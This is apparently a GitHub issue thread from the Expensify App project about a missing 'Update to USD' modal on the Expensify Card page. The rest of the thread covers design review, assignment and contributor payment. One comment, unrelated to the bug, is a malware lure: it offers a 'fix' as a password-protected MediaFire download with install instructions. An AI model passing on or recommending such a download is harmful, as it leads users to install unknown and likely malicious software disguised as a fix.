### ISSUE TITLE
[Awaiting payment][$250] Inconsistency between updating the currency in the Expensify card page and the Workflow page.

### ISSUE THREAD

**Issue by m-natarajan** [Expensify/App#48386]
If you haven’t already, check out our [contributing guidelines](https://github.com/Expensify/ReactNativeChat/blob/main/contributingGuides/CONTRIBUTING.md) for onboarding and email contributors@expensify.com to request to join our Slack channel!
___

**Version Number:** 9.0.27-0
**Reproducible in staging?:** Y
**Reproducible in production?:** Y
**If this was caught during regression testing, add the test name, ID and link from TestRail:**
**Email or phone of affected tester (no customers):**
**Logs:** https://stackoverflow.com/c/expensify/questions/4856
**Expensify/Expensify Issue URL:**
**Issue reported by:** @dukenv0307 
**Slack conversation:** https://expensify.slack.com/archives/C049HHMV9SM/p1725143015506259

## Action Performed:
1. Create a workspace
2. Change the currency to a value other than USD.
3. Enable Workflow and Expensify Card
4. Go to Workflow page and click button 'Connect bank account'
5. Go to Expensify Card Page and click button 'Issue new card'
## Expected Result:
Make it consistent between the two pages; on the Expensify Card page, we should also have a modal with an 'Update to USD' button.
## Actual Result:
On the Workflow page, we have a modal with an 'Update to USD' button, but on the Expensify Card page, we do not.
## Workaround:
Unknown
## Platforms:

Which of our officially supported platforms is this issue occurring on?
- [ ] Android: Native
- [ ] Android: mWeb Chrome
- [ ] iOS: Native
- [ ] iOS: mWeb Safari
- [x] MacOS: Chrome / Safari
- [ ] MacOS: Desktop

## Screenshots/Videos

Add any screenshot/video evidence

https://github.com/user-attachments/assets/a2c444cd-4023-4261-9d8b-3977edb15651

https://github.com/user-attachments/assets/c885f615-04e2-4298-9575-9c966211fdb3

</details>

[View all open jobs on GitHub](https://github.com/Expensify/App/issues?q=is%3Aopen+is%3Aissue+label%3A%22Help+Wanted%22)

<details><summary>Upwork Automation - Do Not Edit</summary>
    <ul>
        <li>Upwork Job URL: https://www.upwork.com/jobs/~01ec753c2da5bbc180</li>
        <li>Upwork Job ID: 1830733066832896667</li>
        <li>Last Price Increase: 2024-09-02</li>
<li>Automatic offers: </li>
<ul>
<li>dukenv0307 | Reviewer | 103792429</li>
</ul></li>
    </ul>
</details>

<details><summary>Issue Owner</summary>Current Issue Owner: @</details>

<details><summary>Issue Owner</summary>Current Issue Owner: @jliexpensify</details>

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by jliexpensify** [comment]
Tagging in @Expensify/design in the Slack thread to review, as we're adding in a modal.

**Comment by dubielzyk-expensify** [comment]
Added comment in Slack for it 👍

**Comment by jliexpensify** [comment]
Discussions on what colour to use are [ongoing](https://expensify.slack.com/archives/C049HHMV9SM/p1725287886410159?thread_ts=1725143015.506259&cid=C049HHMV9SM) but sounds like we will move this forward.

**Comment by pecanoro** [comment]
Assigning @daledah to the issue!

**Comment by pecanoro** [comment]
@jliexpensify The bot failed here to update the issue, it should be ready for payment

**Comment by jliexpensify** [comment]
@daledah please share your Upworks profile again (if you added your details, the automation would properly hire you!)

**Comment by jliexpensify** [comment]
Payment Summary

- C: @daledah $250
- C+: @dukenv0307 $250 CHECKLIST NEEDED?

[Upwork job](https://www.upwork.com/jobs/~01ec753c2da5bbc180)

**Comment by jliexpensify** [comment]
Cool hired you @daledah

**Comment by jliexpensify** [comment]
Paid everyone and job closed!
